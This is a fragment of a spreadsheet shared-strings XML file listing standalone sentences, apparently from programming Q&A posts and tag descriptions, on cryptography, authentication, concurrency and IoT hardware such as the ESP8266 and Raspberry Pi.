    <t>A JSON Schema validation implementation in pure Java, which aims for correctness and performance</t>
  </si>
  <si>
    <t>ApiAxle is a proxy that sits on your network, in front of your API(s) and manages things that you shouldn't have to, like rate limiting, authentication and analytics.</t>
  </si>
  <si>
    <t>A program or library is non-thread-safe, when usage in a threaded environment can provoke errors.</t>
  </si>
  <si>
    <t>Stamplay makes this fast, easy and more secure with a higher-level abstraction.</t>
  </si>
  <si>
    <t>Microsoft Azure Key Vault is a cloud-hosted service that allows applications to encrypt/decrypt data using (HSM stored) cryptographic keys and store and retrieve secrets.</t>
  </si>
  <si>
    <t>MongoDB's replica set uses redundant nodes to provide a high availability and resilience against network partitions of the primary node.</t>
  </si>
  <si>
    <t>It is most commonly used in the design, verification, and implementation of digital logic chips.</t>
  </si>
  <si>
    <t>VeraCrypt is independent, audited, secure full disk encryption software for Windows, Linux, and more.</t>
  </si>
  <si>
    <t>Generative adversarial networks (GANs) are a class of artificial intelligence algorithms used in unsupervised (and semi-supervised) machine learning, implemented by a system of two neural networks contesting with each other in a zero-sum game framework.</t>
  </si>
  <si>
    <t>MD5 is no longer considered a secure hash and should not be used to protect sensitive information like passwords</t>
  </si>
  <si>
    <t>Hashlib is a Python module that implements a common interface to many different secure hash and message digest algorithms.</t>
  </si>
  <si>
    <t>Character encoding refers to the way characters are represented as a series of bytes.</t>
  </si>
  <si>
    <t>A hash table in programming is a collection that uses a hash function to map identifying values (keys) to their associated values.</t>
  </si>
  <si>
    <t>"User permissions" refers to the permissions defined by modules to allow users to do specific actions defined from modules.</t>
  </si>
  <si>
    <t>A smartcard is a card with an embedded chip that may store cryptographic keys and/or perform cryptographic functions.</t>
  </si>
  <si>
    <t>In Java SE 7 and later, you can retrieve suppressed exceptions; see the section 'Suppressed Exceptions' for more information.</t>
  </si>
  <si>
    <t>Indeed, attackers could spy the
memory and discover encryption keys or plain text data.</t>
  </si>
  <si>
    <t>That will let the decryption method ignore padding errors, and give you some output to examine.</t>
  </si>
  <si>
    <t>The main variants are:
LynxOS
LynxOS-178
LynxOS-SE
LynxSECURE
When asking your questions, please specify which variant, the version, and what processor architecture you are using.</t>
  </si>
  <si>
    <t>Sign or or create an account on MDN (by clicking on sign in near the top-right of the screen).</t>
  </si>
  <si>
    <t>You can have a look at its full source and check whether the encryption algorithms are implemented correctly.</t>
  </si>
  <si>
    <t>Example:
In a common UNIX environment, the list of users for identification is placed in /etc/passwd, and secret authentication hashes in /etc/shadow.</t>
  </si>
  <si>
    <t>The device side of the Widvine solution is the CDM (Content Decryption Module) and EME (Encrypted Media Extension).</t>
  </si>
  <si>
    <t>Corruption of a single bit in a packet requires that the entire packet be retransmitted.</t>
  </si>
  <si>
    <t>It is not intended to replace proper security measures, and should never be used in place of proper encryption.</t>
  </si>
  <si>
    <t>For example: if a
login attempt failed for the same user 5 times, then this user
account could be blocked assuming someone is trying to hack it.</t>
  </si>
  <si>
    <t>The software takes only 273364 cycles to verify a signature on Intel's widely deployed Nehalem/Westmere lines of CPUs.</t>
  </si>
  <si>
    <t>Conversely it increases the responsibilities of the application / developer to ensure that operations are valid and properly synchronized with each other.</t>
  </si>
  <si>
    <t>References:
Website
GitHub
Documentation
Various included asymmetric schemes</t>
  </si>
  <si>
    <t>PKCS #12 defines an archive file format for storing many cryptography objects as a single file.</t>
  </si>
  <si>
    <t>About
Apache NiFi, formerly Niagara Files, is a powerful data routing and transformation system originally created by the National Security Agency (NSA).</t>
  </si>
  <si>
    <t>Ansible 2.x features new commands like ansible-vault, allowing you to store encrypted information in playbooks and have them decrypted on the fly.</t>
  </si>
  <si>
    <t>Features
Despite being small for purposes of speed and security, many more complicated FTP setups are achievable with vsftpd!</t>
  </si>
  <si>
    <t>Just sign-in using your Twitter account and then
fill out the short form at https://apps.twitter.com/app/new.</t>
  </si>
  <si>
    <t>International Telephone Input (intl-tel-input) is a jQuery plugin for entering and validating international telephone numbers.</t>
  </si>
  <si>
    <t>Create, import and modify Adobe PDF and PDF/A documents including document access security settings and digital signatures.</t>
  </si>
  <si>
    <t>unique constraint (string.string) violated
Cause:
An UPDATE or INSERT statement attempted to insert a duplicate key.</t>
  </si>
  <si>
    <t>A Signature in general contains the following elements :
Signature - Root Element.</t>
  </si>
  <si>
    <t>If a message has been tampered with or was not signed by the expected party the verification of the signature will fail.</t>
  </si>
  <si>
    <t>Algorithms include des, blowfish, arcfour, enigma, ghost, LOKI97, RC2, serpent, threeway, twofish, wake, XTEA
MCrypt/Libmcrypt development site
Caution
Please note that the MCrypt library has not been updated since 2007.</t>
  </si>
  <si>
    <t>Once you are happy with your structure and do not want the data structure to change any further you can invoke the freeze command:
This will lock your schema and prevent changes.</t>
  </si>
  <si>
    <t>But I could have combined them all into one integer and used bitmask operations to set and test the status.</t>
  </si>
  <si>
    <t>If I run this was only "node script.js" I get a permission error because everything on low port ranges requires special permission - run with "sudo" fixes that.</t>
  </si>
  <si>
    <t>A second possibility is to put activation times into your data packets.</t>
  </si>
  <si>
    <t>Also, beware of using ints as that suggests signed values, use uints, safer and probably faster.</t>
  </si>
  <si>
    <t>However, once the access conditions are set to such an invalid value, the security logic of the chip will disable all access to the wole sector.</t>
  </si>
  <si>
    <t>1) gateway id is case sensitive
2) end lorwan device was not transmitting on right AU_915 band
Now all looks good.</t>
  </si>
  <si>
    <t>Pure-FTPd is a free (BSD), secure, production-quality and standard-conformant FTP server.</t>
  </si>
  <si>
    <t>Winlogon is the component of Microsoft Windows operating systems that is responsible for handling the secure attention sequence.</t>
  </si>
  <si>
    <t>Message processing guarantees are explicitly excluded from the design.</t>
  </si>
  <si>
    <t>For Trusted Oracle configured in DBMS MAC mode, you may see this message if a duplicate entry exists at a different level.</t>
  </si>
  <si>
    <t>SyncLock is the VB.NET keyword for its locking statement, allowing any non-structure type to be locked by a transaction.</t>
  </si>
  <si>
    <t>Hardware Security Modules are computer devices that provide a protected environment in which cryptographic keys can be generated, used and (in some cases) stored.</t>
  </si>
  <si>
    <t>Soft deleting also prevents accidental data losses.</t>
  </si>
  <si>
    <t>Thus it is as much an escape hatch as a device to easily document code that might require increased attention.</t>
  </si>
  <si>
    <t>The request has not been applied because it lacks valid authentication credentials for the target resource.</t>
  </si>
  <si>
    <t>the contents can be changed and it has no hash value and cannot be used as either a dictionary key or as an element of another set.</t>
  </si>
  <si>
    <t>The purpose of the library is to provide fundamental protocol access, not higher-level abstractions.</t>
  </si>
  <si>
    <t>I think for some reason the lock state isn't changing because I am only getting cases 2 and 4.</t>
  </si>
  <si>
    <t>Since, random amount of users may come to the shop and if I do not disconnect them from ESP, other users won't be able to share the info.</t>
  </si>
  <si>
    <t>Unfortunately, we have not yet been able to configure the UWF to protect the system partition down to the sector level like before.</t>
  </si>
  <si>
    <t>Enterprise level 802.1x encryption is not supported in these modules.</t>
  </si>
  <si>
    <t>Tumblr's lightweight framework for building high-performance applications in Scala that require non-blocking network I/O.</t>
  </si>
  <si>
    <t>Answering this question may not require any specialist cryptographic knowledge.</t>
  </si>
  <si>
    <t>However, this did not work for top-level domains where only third-level registrations are allowed (e.g.</t>
  </si>
  <si>
    <t>See also: cryptography
Note: conceptual questions about encryption might get more attention and better answers from the Crypto stack exchange.</t>
  </si>
  <si>
    <t>Execute is equivalent to 1
When we want to set permissions, we just add up the number.</t>
  </si>
  <si>
    <t>So, you need to extract the phone number at compare it with the authorized one.</t>
  </si>
  <si>
    <t>I tried goding through telnet for a bit and updated firmware again just in case.</t>
  </si>
  <si>
    <t>Or you can always access ESPs using proxy - in that case the URLs will not depend upon being inside or outside the local network.</t>
  </si>
  <si>
    <t>You must filter for beacons at a higher level.</t>
  </si>
  <si>
    <t>The Input data that is used to test also generated randomly and keyed into the system.</t>
  </si>
  <si>
    <t>It applies a hash algorithm to data and uses a private key or secret key to provide sender authentication.</t>
  </si>
  <si>
    <t>Forensics
Zeek comprehensively logs what it sees and provides a high-level archive of a network's activity.</t>
  </si>
  <si>
    <t>which CA certificate is used at the registry level and how to generate it.</t>
  </si>
  <si>
    <t>I am getting incorrect result after I've decrypted.</t>
  </si>
  <si>
    <t>Unfortunately even security-level high or medium didn't help.</t>
  </si>
  <si>
    <t>It is just the low level access what is disabled.</t>
  </si>
  <si>
    <t>A root certificate is part of a public key infrastructure scheme.</t>
  </si>
  <si>
    <t>For iPhone, there's "Slide to Lock" and for Android there are many variations.</t>
  </si>
  <si>
    <t>One caveat being that some settings altered on Canary will sync  but only if you sign in.</t>
  </si>
  <si>
    <t>You'll want to open up the avrdude.conf file in Arduino's program files
for mac: show package contents for PC and Linux just search the Program Files
in this file search for " ATMEGA328P " under it should be a field named signature replace "0x1e 0x95 0x14" (the 328 signature) with "0x1e 0x95 0x0F" (the 328p signature)
Follow step 2 - 4  below, if this works you're all set.</t>
  </si>
  <si>
    <t>:-)
Longer-term, we might expose a non-SSL endpoint for Firebase requests that's specifically for this sort of low-end hardware use-case.</t>
  </si>
  <si>
    <t>[1] It builds on the difficulty of earlier, challenging esoteric languages (such as Brainfuck and Befunge), but takes this aspect to the extreme, playing on the entangled histories of computer science and encryption.</t>
  </si>
  <si>
    <t>SIGTERM will send terminate signal to process which is near to kill the process safely but SIGKILL is more powerful signal 
But in your case, you can try this if permissions is not the issue.</t>
  </si>
  <si>
    <t>The IAM role associated with the authenticated user is correct, and I can sign requests and perform other private operations like calling APIG endpoints.</t>
  </si>
  <si>
    <t>Private profiles are defined by a manufacturer whereas public profiles are defined, developed, and maintained by the ZigBee Alliance.</t>
  </si>
  <si>
    <t>Then depending on the amount of the devices, you'd need to set a master that'd create a public WiFi network so others can connect to it through WiFi SSID polling.</t>
  </si>
  <si>
    <t>So I was able to send a SMS:
Is it (technical) possible to change (spoof) the sender phone number?</t>
  </si>
  <si>
    <t>So I think I need to somehow identify connected clients, and MAC is not an option because it is subject to change randomly on, say, Apple devices.</t>
  </si>
  <si>
    <t>As a work-around I could have a server-side process pick up files once they've been received and move them elsewhere, but if the device id/key was restricted to create-only then I wouldn't need this overhead.</t>
  </si>
  <si>
    <t>The basic code is:
The role that I am trying to assume  has no policies assigned to it natively but does have a trust relationship with arn:aws:sts::xxxxxxxxx:assumed-role/lambda_role/lambda_function_name.</t>
  </si>
  <si>
    <t>I am separating the operations as so since my security camera operates on a raspberry pi zero which is not very fast and cant handle heavy lifting.</t>
  </si>
  <si>
    <t>If the device you are communicating with sends two's complement signed values, it may be as simple as casting the results of the read to a  type.</t>
  </si>
  <si>
    <t>You choose the lock file name based on the scope you want your lock to have:
If you only want one email per hour, you can use something like /var/lock/motionmail because there's just one per system.</t>
  </si>
  <si>
    <t>Your web server will need to implement two primary things:
You'll need an OAuth2 server that can issue tokens that represent your users.</t>
  </si>
  <si>
    <t>Try this
Furthemore, I think that you should avoid to unlock mutex within thread, because at the end of scope, unique_lock automatically releases lock</t>
  </si>
  <si>
    <t>A spin-wait loop is a technique used in multithreaded applications whereby one thread waits for other threads for protecting a critical section, for barriers, or for other synchronizations.</t>
  </si>
  <si>
    <t>The enterprise needs to ensure that work-related information is encrypted and is kept separate from employees' personal data.</t>
  </si>
  <si>
    <t>An exploit is a piece of software, a chunk of data, or sequence of commands that takes advantage of a bug, glitch, or vulnerability in order to cause unintended or unanticipated behavior to occur.</t>
  </si>
  <si>
    <t>A .Net class that provides blocking and bounding capabilities for thread-safe collections.</t>
  </si>
  <si>
    <t>Typical Implementations of Surrogate Keys
Most commonly, a surrogate key is implemented as an auto-incremented integer.</t>
  </si>
  <si>
    <t>Also, SOX increased the independence of the outside auditors who review the accuracy of corporate financial statements, and increased the oversight role of boards of directors.</t>
  </si>
  <si>
    <t>RELIC can be used to build efficient and usable cryptographic toolkits tailored for specific security levels and algorithmic choices.</t>
  </si>
  <si>
    <t>Orbot uses Tor to encrypt your Internet traffic and then hides it by bouncing through a series of computers around the world."</t>
  </si>
  <si>
    <t>Rust-Crypto seeks to create a practical, pure Rust implementation of useful cryptographic algorithms, with a minimum amount of assembly helper code where appropriate.</t>
  </si>
  <si>
    <t>This approach may be used in dealing with deadlocks in concurrent programming if they are believed to be very rare and the cost of detection or prevention is high.</t>
  </si>
  <si>
    <t>A scanned FIPS 140-2 Validation Certificate document is available for download on the NIST web page.</t>
  </si>
  <si>
    <t>In 2005, security flaws were identified in SHA-1, namely that a mathematical weakness might exist, indicating that a stronger hash function would be desirable.</t>
  </si>
  <si>
    <t>A major argument for micro-kernels is that their small size makes them easier to analyze and more secure.Tanenbaum
Most well known operating systems are monolithic.</t>
  </si>
  <si>
    <t>Key exchange: diffie-hellman-group-exchange-sha1, diffie-hellman-group1-sha1
Cipher: blowfish-cbc, 3des-cbc, aes128-cbc, aes192-cbc, aes256-cbc, aes128-ctr, aes192-ctr, aes256-ctr, 3des-ctr, arcfour, arcfour128, arcfour256
MAC: hmac-md5, hmac-sha1, hmac-md5-96, hmac-sha1-96
Host key type: ssh-dss, ssh-rsa
Userauth: password
Userauth: publickey (DSA, RSA)
Userauth: keyboard-interactive
Userauth: gss-api-with-mic
X11 forwarding
xauth spoofing
connection through HTTP proxy.</t>
  </si>
  <si>
    <t>iwa commonly uses an NTLM or Kerberos mechanism to allow single sign-on (SSO) authentication to a protected resource, such as a web server, on the local network.</t>
  </si>
  <si>
    <t>Using this information, an attacker could launch a brute force attack or massive account lock denial-of-service.</t>
  </si>
  <si>
    <t>I found that it is working fine in secure world but in the NS world the control goes to the NS reset handler for a SWI instead of SWI handler.</t>
  </si>
  <si>
    <t>Connection establishment works fine as long as I register the device on IoT Hub as 'X.509 Self-Signed' with the SHA1 fingerprint of the device cert as the primary/secondary fingerprint.</t>
  </si>
  <si>
    <t>Add a button verifying routine to the middle and end of each "SOS" letter in order to clear the ledMode.</t>
  </si>
  <si>
    <t>Although it's an Intel CPU, there aren't that many resources(400MHz CPU, 256MB RAM) on the Intel Galileo for advanced computer vision algorithms (such as face detection).</t>
  </si>
  <si>
    <t>How to do this can be found here: https://picamera.readthedocs.io/en/release-1.13/recipes1.html#capturing-to-a-network-stream
Or you can try to do the store-step in a separate thread.</t>
  </si>
  <si>
    <t>The object initialization requires only a pin number and a long that identifies the sensor model.</t>
  </si>
  <si>
    <t>One disadvantage, to be aware of is that SMS is not a guaranteed messaging system, although you could build some sort of acknowledgment on top of SMS if you wanted.</t>
  </si>
  <si>
    <t>Digits lets people create an account or sign into your app using nothing but their phone number on iOS and Android.</t>
  </si>
  <si>
    <t>For example, one validator checks for null strings and another validator checks that a number falls within a specified range.</t>
  </si>
  <si>
    <t>The value of any key can be requested at any time, and asset will always return its value synchronously, although it may have to block the calling thread in order to do so.</t>
  </si>
  <si>
    <t>The ProGuard tool shrinks, optimizes, and obfuscates your code by removing unused code and renaming classes, fields, and methods with semantically obscure names.</t>
  </si>
  <si>
    <t>It allows client applications to encrypt sensitive data without revealing the encryption keys to the database engine, so the data cannot be accessed either in flight or at rest.</t>
  </si>
  <si>
    <t>Enable end-to-end security using asymmetric key authentication over TLS 1.2; CA signed certificates can be used to verify device ownership.</t>
  </si>
  <si>
    <t>Clients and servers can encrypt the data being exchanged and
  mutually authenticate themselves; daemons can encrypt private data for
  added security.</t>
  </si>
  <si>
    <t>This makes for an easy sign-up and sign-in process and gives you access to PayPal's active users.</t>
  </si>
  <si>
    <t>There is adb that is a telnet solution but requires developer settings enable on your device, also is subject to the level of rights that you have on your device.</t>
  </si>
  <si>
    <t>Supports user authentication with passport.js, role-based permissioning, object ownership, and row-level security.</t>
  </si>
  <si>
    <t>libtls is a high-level secure sockets API provided as part of the LibreSSL project</t>
  </si>
  <si>
    <t>Serpent is a high-level programming language used to write smart contracts in Ethereum.</t>
  </si>
  <si>
    <t>Since this is a sample program, I haven't yet added logic to verify the checksum digit for data coming from the device.</t>
  </si>
  <si>
    <t>Escalating the Apache user's permissions to root is extremely dangerous and may compromise the entire system, so sudo'ing, chroot'ing, or otherwise running as root should not be considered by those who are not security professionals.</t>
  </si>
  <si>
    <t>Email may contain an email-signature, PDF documents may contain a digitized written signature.</t>
  </si>
  <si>
    <t>Also, sorry ahead of time about my inferior lack of network, but I believe my school's student wifi uses "trust certificates" (?).</t>
  </si>
  <si>
    <t>You would need to develop a bread-board to protect your Raspberry and allow for monitoring higher voltages.</t>
  </si>
  <si>
    <t>In web programming, it is used to lower the chances of a DDOS attack, by the website/app releasing data in a limited speed.</t>
  </si>
  <si>
    <t>hstore is data type for storing sets of key/value pairs in Postgres, similar to hashes in Ruby and Perl, associative arrays in PHP or dictionaries in Python.</t>
  </si>
  <si>
    <t>The sequences are typically stored in files and one of them is referred to as the public key while the other is the private key.</t>
  </si>
  <si>
    <t>If you are the only user of this device, you can set the permissions for these devices to include world readable/writeable (mode 666).</t>
  </si>
  <si>
    <t>Django(a high-level Python Web framework) comes with a user authentication system.</t>
  </si>
  <si>
    <t>In either case, the signatures on a certificate are attestations by the certificate signer that the identity information and the public key belong together.</t>
  </si>
  <si>
    <t>I need to boot Raspberry Pi with LUKS encrypted root partition in unattended mode.</t>
  </si>
  <si>
    <t>Valid data bytes can be 0x00 all the time.</t>
  </si>
  <si>
    <t>Yes, I understand the security implications behind this so please don't do this in a production environment.</t>
  </si>
  <si>
    <t>In the case of HID scan codes, your 31010 is in fact two bytes 0x01 and 0x36 (in hexadecimal).</t>
  </si>
  <si>
    <t>The https protocol compares the URL in the browser to the Common Name or Subject Alternative name in the bank's X.509 certificate.</t>
  </si>
  <si>
    <t>Scala signatures
How does abstract override work internally?</t>
  </si>
  <si>
    <t>In Pascal case, there is no indicator of the data type of the identifier.</t>
  </si>
  <si>
    <t>I get the same result, if instead of the first cycle I write: 
password = tempStr</t>
  </si>
  <si>
    <t>Since i'm still a beginner i don't know how i should compare two fingerprints to know if they're identical.</t>
  </si>
  <si>
    <t>I think it's low quality fake IC's.</t>
  </si>
  <si>
    <t>A KDF is used within the field of cryptography to generate one or more keys from a seed value.</t>
  </si>
  <si>
    <t>moztrust compares how trustworthy a website is compared to others.</t>
  </si>
  <si>
    <t>Mt.exe is a tool that generates signed files and catalogs.</t>
  </si>
  <si>
    <t>High- and low-level protocols (e.g., SNEP, handling of NDEF messages)
NFC modes: Reader mode, Card Emulation mode, Peer-to-peer (P2P) mode
Wi-Fi and Bluetooth pairing
Smartcard chipsets support
NFC HAL for porting to different NFC hardware
See here for details.</t>
  </si>
  <si>
    <t>This is a value-based class; use of identity-sensitive operations (including reference equality (==), identity hash code, or synchronisation) on instances of LocalDateTime may have unpredictable results and should be avoided.</t>
  </si>
  <si>
    <t>There's a number of blog posts available on Google covering this exact issue, including some forks of the Ethernet library that would allow you to do this in a non-blocking fashion.</t>
  </si>
  <si>
    <t>/proc/sys/vm/dirty_ratio: The maximum amount of memory (in percent) to
  be used to store dirty data before the process that generates the data
  will be forced to write it out.</t>
  </si>
  <si>
    <t>The reason the code is projected at around a thousand lines is since we may implement mobile application communications into it, locking/unlocking the door, etc.</t>
  </si>
  <si>
    <t>Should I have the client connect to an intermediary like PHP/Java that checks a database of usernames+passwords with rate limiting etc,
or use fail2ban and connect directly to the mysql server?</t>
  </si>
  <si>
    <t>([Project Name])
The reference 'System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=[bunch of letters and numbers]' is not valid for the target framework of the project.</t>
  </si>
  <si>
    <t>([Project Name])
The reference 'Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=[Bunch of letters and numbers]' is not valid for the target framework of the project.</t>
  </si>
  <si>
    <t>Question: is there a unique number that is secure that I can just emit to a database as a unique id or will there have to be some kind of back and forth?</t>
  </si>
  <si>
    <t>Also the class doing the serial communication is not thread safe, so any method which may cause thread safe problem cannot be used.</t>
  </si>
  <si>
    <t>For some reason, if the card is inserted, it throws out these strange hieroglyphs and does not throw what it should be (the user and password encrypted by base64).</t>
  </si>
  <si>
    <t>I wanted to ask if this form of file upload has the same integrity checks using MD5 hash as there is with normal blob storage uploading.</t>
  </si>
  <si>
    <t>It is also because my security camera is hooked up to a battery and I am trying to lower the Pi's usage hence why I am dedicating a main hub for the heavy operations.</t>
  </si>
  <si>
    <t>As an internal monitoring tool, my application requires no encryption or privacy so ideally I can get around the entropy issue.</t>
  </si>
  <si>
    <t>If for some reason, you need details into the connection, there are special byte sequences that allow communication with the bluetooth hardware.</t>
  </si>
  <si>
    <t>That is true as long as the manufacturer follows "the rules" about giving each device a unique serial number.</t>
  </si>
  <si>
    <t>The argument passed should be an absolute filename or wildcard expression, optionally prefixed with "-", which indicates that if the file does not exist, it will not be read and no error or warning message is logged.</t>
  </si>
  <si>
    <t>BUT looking at the error in your question it seems that the declarations is implemented with the sensor identification number as first argument and the pin number as second.</t>
  </si>
  <si>
    <t>Check for creation of the temp.lock file when page is accessed, if temp.lock file exists, deny access to that page.</t>
  </si>
  <si>
    <t>This lead to the corporate networks effectively 'jam' access to my Wi-Fi as the list appears to be sorted by signal strength, and my network's RSSI was weaker than the corporate one's.</t>
  </si>
  <si>
    <t>(This tag should be `android-proguard` not `android-progaurd`) The ProGuard tool shrinks, optimizes, and obfuscates your code by removing unused code and renaming classes, fields, and methods with semantically obscure names.</t>
  </si>
  <si>
    <t>CallKit is a framework for iOS that lets VoIP apps integrate with the iPhone UI, and has app extensions that enable call blocking and caller identification.</t>
  </si>
  <si>
    <t>a digital currency in which encryption techniques are used to regulate the generation of units of currency and verify the transfer of funds.</t>
  </si>
  <si>
    <t>SCrypt is a key derivation function (KDF) based  on the concept of sequential memory-hard functions mostly used for password hashing.</t>
  </si>
  <si>
    <t>For questions on Total Memory Encryption (TME) and extensions such as Multi-Key Total Memory Encryption (MKTME).</t>
  </si>
  <si>
    <t>A binary-safe file read function in C/C++/PHP that returns the specified number of bytes from a stream.</t>
  </si>
  <si>
    <t>Keyczar
Keyczar is an open source cryptographic toolkit designed to make it easier and safer for developers to use cryptography in their applications.</t>
  </si>
  <si>
    <t>More recent versions of iTunes also limit the number of clients to 5 unique IP addresses within a 24-hour period.</t>
  </si>
  <si>
    <t>OCaml code, including creating and waiting on promises, is run in a single thread by default, so you don't have to worry about locking or preemption.</t>
  </si>
  <si>
    <t>The reference implementation for LUKS operates on Linux and is based on an enhanced version of cryptsetup, using dm-crypt as the disk encryption backend.</t>
  </si>
  <si>
    <t>Any scanning above this rate MAY(and will in the case of out of phase requests) give invalid/inconstant results.</t>
  </si>
  <si>
    <t>The Data Protection Act (DPA) is law in most countries with a number of rules and regulations concerning personal and private data.</t>
  </si>
  <si>
    <t>TOR Project (originally short for The Onion Router) is software for enabling online anonymity.</t>
  </si>
  <si>
    <t>The above scenarios generate false flags and as a result my bot stops.</t>
  </si>
  <si>
    <t>Indeed, I have been able to make connection establishment work in 'X.509 CA-Signed' mode by setting up the certificates with the MS PowerShell scripts (https://docs.microsoft.com/en-us/azure/iot-hub/iot-hub-security-x509-create-certificates).</t>
  </si>
  <si>
    <t>This all is because the format of a define is as follows:
#define identifier token-string newline</t>
  </si>
  <si>
    <t>They usually execute in the most trusted CPU context of the operating system (variously called "kernel mode", "ring 0", "executive mode", etc.)</t>
  </si>
  <si>
    <t>It would be best &amp; the most secure if you wrote a short script that could generate a keypair on each raspberry pi and then copied the public key to the server (e.g.</t>
  </si>
  <si>
    <t>Encoder is a software program, device or algorithm that converts information from one format or code to another, for the purposes of standardization, speed, secrecy, security or compressions.</t>
  </si>
  <si>
    <t>Overview
Zend_Auth provides an API for authentication and includes concrete authentication adapters for common use case scenarios.</t>
  </si>
  <si>
    <t>It also appears that configuration messages can differ depending on the mode of the device.</t>
  </si>
  <si>
    <t>I hope there's a way which it can only whitelist a specific number so no one can prank the program without the owner's knowledge.</t>
  </si>
  <si>
    <t>parser.add_argument(
      '--algorithm',
      choices=('RS256', 'ES256'),
      required=True,
      help='Which encryption algorithm to use to generate the JWT.')</t>
  </si>
  <si>
    <t>An authorised recipient can easily decrypt the message with the key, provided by the originator to recipients but not to unauthorised interceptors.</t>
  </si>
  <si>
    <t>Colossus is Tumblr's lightweight framework for building high-performance applications in Scala that require non-blocking network I/O.</t>
  </si>
  <si>
    <t>I copied the hash password from there but even that didn't result in the login prompt.</t>
  </si>
  <si>
    <t>Use only for actual characters and do not rely on their signed-ness.</t>
  </si>
  <si>
    <t>For production, you would typically move to a more hardened platform with onboard flash.</t>
  </si>
  <si>
    <t>The method isn't being found due to a name or signature mismatch.</t>
  </si>
  <si>
    <t>However in such cases, any NIS client can retrieve the entire password database for offline inspection.</t>
  </si>
  <si>
    <t>After the applications has been verified dexopt generates an optimized version of it.</t>
  </si>
  <si>
    <t>Some security frameworks automatically generate a random IV (e.g.</t>
  </si>
  <si>
    <t>This could be the case if an attacker would steal the device auth key or the SAS token.</t>
  </si>
  <si>
    <t>In the Device Explorer for IoT Hub when generating the SAS token what is the maximum TTL that can be set?</t>
  </si>
  <si>
    <t>In bluetoothchat source they are defined as public.</t>
  </si>
  <si>
    <t>Solution
I assume that you already generate CA's key, rootCA.key.</t>
  </si>
  <si>
    <t>The ESP8266 is too slow to use certificates reliably.</t>
  </si>
  <si>
    <t>Public Key Infrastructure or PKI is one way to achieve this.</t>
  </si>
  <si>
    <t>That way, the lack of purity percolates up the whole call chain.</t>
  </si>
  <si>
    <t>I was wondering if there is a way to use an RSA public key file for authentication instead of the password.</t>
  </si>
  <si>
    <t>AWS can generate the certificates for you or you could generate and sign your own certificates.</t>
  </si>
  <si>
    <t>Cryptographic credentials may be self-issued, or issued by a trusted third party; in many cases the only criterion for issuance is unambiguous association of the credential with a specific, real individual or other entity.</t>
  </si>
  <si>
    <t>I am trying to run some code inside a lambda function that will issue a signed URL that was signed with a set of temporary credentials that have a custom policy.</t>
  </si>
  <si>
    <t>Are about to implement support for key rollover, swapping primary/secondary key up on connection failure related to bad credentials.</t>
  </si>
  <si>
    <t>Assuming that the raspberry pie connection is already sorted out (We're using a static SSID and Password for the hotspot)
The questions that come up are:
Which framework should I use (assuming there is one already)?</t>
  </si>
  <si>
    <t>But from your goals:
how IO ports work
memory limitations/requirements
interrupt service routines
I wonder if you best bet is just to hack in the Linux kernel?</t>
  </si>
  <si>
    <t>So, even if the input is "forwards", There are two pieces that execute-
   block 
The only else block (since the last if is false)
So, you get the "Invalid input, try again" message.</t>
  </si>
  <si>
    <t>If you use Modbus/TCP, you trade the device address and CRC (total of 3 bytes) for a 6-byte header and a 1-byte unit identifier; the max count of registers in a single response drops to 123.</t>
  </si>
  <si>
    <t>They don't provide a mechanism for encrypting credentials on the device or a way to ensure that no one has altered the code that's running, and you end up in a situation like this one: https://thehackernews.com/2016/01/doorbell-hacking-wifi-pasword.html
However, the ESP-32 does provide that.</t>
  </si>
  <si>
    <t>If you are sending sensitive data over BLE, then you have to consider multi-level encryption that includes hardware, software, and then the communication link (BLE).</t>
  </si>
  <si>
    <t>A Subject Matter Expert (SME), preferably the owner or client of the object under test, provides such confirmation after trial or review.</t>
  </si>
  <si>
    <t>Intel SGX is a set of CPU instruction extensions that allows application developers to create applications that retain the confidentiality and integrity of select data and code using Secure Enclaves.</t>
  </si>
  <si>
    <t>In cryptography, HMAC (Hash-based Message Authentication Code) is a specific construction for calculating a message authentication code (MAC) involving a cryptographic hash function in combination with a secret key.</t>
  </si>
  <si>
    <t>Commonly this process depends on the database access to store those lists and handling sessions to keep user's identity and authentication available for the application to confirm them as it required.</t>
  </si>
  <si>
    <t>Transport stream specifies a container format encapsulating packetized elementary streams, with error correction and stream synchronization features for maintaining transmission integrity when the signal is degraded.</t>
  </si>
  <si>
    <t>Additionally, the Amazon Linux AMI reduces the number of non-critical packages which are installed on your instance, limiting your exposure to potential security vulnerabilities.</t>
  </si>
  <si>
    <t>Intel SGX is a set of CPU instruction extensions that allows application developers to create applications that retain the confidentiality and integrity of select data and code using secure Enclaves.</t>
  </si>
  <si>
    <t>Notarization gives users more confidence that the Developer ID-signed software you distribute has been checked by Apple for malicious components.</t>
  </si>
  <si>
    <t>gVisor should not be confused with technologies and tools to harden containers against external threats, provide additional integrity checks, or limit the scope of access for a service.</t>
  </si>
  <si>
    <t>Users can authenticate with either RSA SecurID tokens or RSA SecurID Access Authenticator Tokencodes from all access points controlled by Authentication Manager including agents, RSA Ready Partner implementations, and RADIUS clients.</t>
  </si>
  <si>
    <t>To
gain privileged access, a MIDlet
suite must be assigned to specific
domains that are defined on the
mobile device, and must be properly
signed using the X.509 PKI security
standard.</t>
  </si>
  <si>
    <t>Best way: (in given case, but not 100% secure):
Create your own certificate (self-signed is ok) and use custom SSL
Use this certificate in Arduino to connect to server (if possible)</t>
  </si>
  <si>
    <t>Using the private key,
  the chip will be able to generate a public key that can be signed by
  the chosen CA of the company.</t>
  </si>
  <si>
    <t>The library is designed to be used in 32-Bit protected mode targeting Win32 console applications.</t>
  </si>
  <si>
    <t>I already have access to the data from the Pis hrng but I do not know how to use/give that data to the PyCrypto function that creates the RSA key, .</t>
  </si>
  <si>
    <t>This is commonly the case when avoiding 
 * built-in browser authentication prompts.</t>
  </si>
  <si>
    <t>Devices that are capable of Master mode are commonly referred to as Access Points.</t>
  </si>
  <si>
    <t>In the rare case of a restart, the whole system should be set to a defined initial safe state.</t>
  </si>
  <si>
    <t>Thus, in most cases, a communication system would draw limits to whom a user's presence may be revealed to.</t>
  </si>
  <si>
    <t>Compared to filtering, the suppressed items are not thrown away, they get just not displayed.</t>
  </si>
  <si>
    <t>In this case, is it better to make separate files(main, login)?</t>
  </si>
  <si>
    <t>I see it says it gets it from the device certificates subject, but is it a case sensitive string match?</t>
  </si>
  <si>
    <t>I'm trying to register an IoT device with Google Cloud IoT Core, and I'm having issues signing the device public key with a CA certificate installed on Google Cloud (device registry).</t>
  </si>
  <si>
    <t>The protocol itself depends in turn on the use cases and threat model.</t>
  </si>
  <si>
    <t>You can have multiple Firefox profiles, each containing a separate set of user information.</t>
